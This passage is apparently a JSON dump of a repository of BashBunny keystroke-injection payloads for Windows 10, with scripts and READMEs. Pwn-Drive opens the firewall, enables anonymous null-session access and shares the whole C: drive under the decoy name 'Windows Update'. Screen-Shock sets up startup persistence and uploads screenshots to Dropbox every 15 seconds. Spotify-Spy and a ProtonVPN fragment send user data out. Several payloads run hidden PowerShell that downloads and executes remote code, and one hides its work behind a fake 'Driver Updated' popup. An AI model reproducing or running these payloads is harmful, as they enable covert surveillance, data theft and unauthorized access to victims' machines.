$_.Exception.Message\r\n     }\r\n }\r\n\r\n  else {\r\n$protonVpnPath = \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\"\r\ncd $protonVpnPath\r\nGet-ChildItem | Where-Object {$_.name -Match \"ProtonVPN.exe\"} | cd\r\nGet-ChildItem | cd\r\n\r\n# Upload user.config to dropbox\r\nDropBox-Upload -f \"user.config\"\r\n} "
  },
  {
    "path": "BashBunny/payloads/Pwn-Drive/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Pwn-Drive\n\nA payload to share the victims \"C:\" drive to the network.\n\n## Description\n\nThis payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Pwn-Drive/c.ps1",
    "content": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n\r\n#Enable File and Print\r\nnetsh firewall set service type=fileandprint mode=enable profile=all\r\n\r\n#Setting Registry Values for allowing access to drive without credentials\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" -Name everyoneincludesanonymous -Value 1 -Force\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanManServer\\Parameters\\\" -Name restrictnullsessacces -Value 0 -Force\r\n\r\n#Sharing the Drive\r\nNew-SmbShare -Name \"Windows Update\" -Path \"C:\\\""
  },
  {
    "path": "BashBunny/payloads/Pwn-Drive/payload.txt",
    "content": "REM     Title: Pwn-Drive\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "BashBunny/payloads/RanFunWare/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# RanFunWare\n\nA payload to prank your friends into thinking their computer got hit with ransomware.\n\n## Description\n\nThis payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/RanFunWare/payload.txt",
    "content": "REM     Title: RanFunWare\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload will prank your target into thinking their machine got hit with ransomware.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "BashBunny/payloads/RanFunWare/r.ps1",
    "content": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path $Path -Name \"HideIcons\" -Value 1\r\nGet-Process \"explorer\"| Stop-Process\r\n\r\n#Changes Background  \r\n#URL For the Image of your choice (Wanna Cry Ransomware Background)\r\n$url = \"https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg\"\r\n\r\n\r\nInvoke-WebRequest $url -OutFile C:\\temp\\test.jpg\r\n\r\n\r\n$setwallpapersrc = @\"\r\nusing System.Runtime.InteropServices;\r\n\r\npublic class Wallpaper\r\n{\r\n  public const int SetDesktopWallpaper = 20;\r\n  public const int UpdateIniFile = 0x01;\r\n  public const int SendWinIniChange = 0x02;\r\n  [DllImport(\"user32.dll\", SetLastError = true, CharSet = CharSet.Auto)]\r\n  private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);\r\n  public static void SetWallpaper(string path)\r\n  {\r\n    SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);\r\n  }\r\n}\r\n\"@\r\nAdd-Type -TypeDefinition $setwallpapersrc\r\n\r\n[Wallpaper]::SetWallpaper(\"C:\\temp\\test.jpg\")\r\n\r\n\r\n#Pop Up Message\r\n\r\nfunction MsgBox {\r\n\r\n[CmdletBinding()]\r\nparam (\t\r\n[Parameter (Mandatory = $True)]\r\n[Alias(\"m\")]\r\n[string]$message,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"t\")]\r\n[string]$title,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"b\")]\r\n[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]\r\n[string]$button,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"i\")]\r\n[ValidateSet('None','Hand','Question','Warning','Asterisk')]\r\n[string]$image\r\n)\r\n\r\nAdd-Type -AssemblyName PresentationCore,PresentationFramework\r\n\r\nif (!$title) {$title = \" \"}\r\nif (!$button) {$button = \"OK\"}\r\nif (!$image) {$image = \"None\"}\r\n\r\n[System.Windows.MessageBox]::Show($message,$title,$button,$image)\r\n\r\n}\r\n\r\nMsgBox -m 'Your Computer Has Been Infected' -t \"Warning\" -b OKCancel -i Warning\r\n"
  },
  {
    "path": "BashBunny/payloads/Screen-Shock/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "BashBunny/payloads/Screen-Shock/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Screen-Shock\n\nThis payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\n\n## Description\n\nThis payload uses iwr to download 2 files\n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, taking a screenshot of all monitors every 15 seconds\n\nThen the contents will then be sent to the DropBox for viewing pleasure\n\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Dropbox\n* Windows 10\n* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Screen-Shock/c.ps1",
    "content": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n    \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n[Alias(\"f\")]\r\n[string]$SourceFilePath\r\n) \r\n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n$outputFile = Split-Path $SourceFilePath -leaf\r\n$TargetFilePath=\"/$outputFile\"\r\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n$authorization = \"Bearer \" + $DropBoxAccessToken\r\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n$headers.Add(\"Authorization\", $authorization)\r\n$headers.Add(\"Dropbox-API-Arg\", $arg)\r\n$headers.Add(\"Content-Type\", 'application/octet-stream')\r\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n}\r\n\r\nwhile(1){\r\n\r\n  Add-Type -AssemblyName System.Windows.Forms,System.Drawing\r\n\r\n  $screens = [Windows.Forms.Screen]::AllScreens\r\n\r\n  $top    = ($screens.Bounds.Top    | Measure-Object -Minimum).Minimum\r\n  $left   = ($screens.Bounds.Left   | Measure-Object -Minimum).Minimum\r\n  $width  = ($screens.Bounds.Right  | Measure-Object -Maximum).Maximum\r\n  $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum\r\n\r\n  $bounds   = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)\r\n  $bmp      = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)\r\n  $graphics = [Drawing.Graphics]::FromImage($bmp)\r\n\r\n  $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)\r\n\r\n  $bmp.Save(\"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\")\r\n  $graphics.Dispose()\r\n  $bmp.Dispose()\r\n  \r\n  start-sleep -Seconds 15\r\n \"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\" | DropBox-Upload\r\n}\r\n"
  },
  {
    "path": "BashBunny/payloads/Screen-Shock/payload.txt",
    "content": "REM     Title: Screen-Shock\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "BashBunny/payloads/Screen-Shock/placeholder",
    "content": "\n"
  },
  {
    "path": "BashBunny/payloads/Spotify-Spy/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Spotify-Spy\n\nThis payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\n\n\n## Description\n\nHave you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone!\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Spotify-Spy/SS.ps1",
    "content": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r\n$F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt\"\r\n\r\n# Gets the name of the spotify user\r\ncd \"$env:APPDATA\\Spotify\\Users\" \r\nGet-ChildItem > $F1\r\n\r\n# Copy Spotify User to Temp Directory to get sent to Dropbox\r\n\r\nCopy-Item \"$F1\" -Destination \"$env:tmp/$F1\" \r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nrm $F1\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "BashBunny/payloads/Spotify-Spy/payload.txt",
    "content": "REM     Title: Spotify-Spy\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\r\n\r\nREM     Target: Windows 10\r\n\r\nQ DELAY 2000\r\nQ GUI r\r\nQ DELAY 500\r\nQ STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nQ ENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "BashBunny/payloads/Water-UnMark/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Water-UnMark\n\nA payload to get rid of the ugly windows activation watermark.\n\n## Description\nThis script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\n\n## Getting Started\n\n### Dependencies\n\n* Unactivated Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Water-UnMark/payload.txt",
    "content": "REM Title:       Water-UnMark\r\nREM Author:      atomiczsec\r\nREM Target OS:   Windows 10\r\nREM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 100\r\nSTRING powershell Start-Process powershell -verb runAs\r\nDELAY 1000\r\nALT Y\r\nDELAY 1000\r\nSTRING Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\r\nENTER\r\nDELAY 100\r\nSTRING Restart-Computer -Force\r\nENTER\r\n"
  },
  {
    "path": "BashBunny/payloads/Water-UnMark/placeholder",
    "content": "\n"
  },
  {
    "path": "BashBunny/payloads/cApS-Troll/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# cApS-Troll\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Description\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, 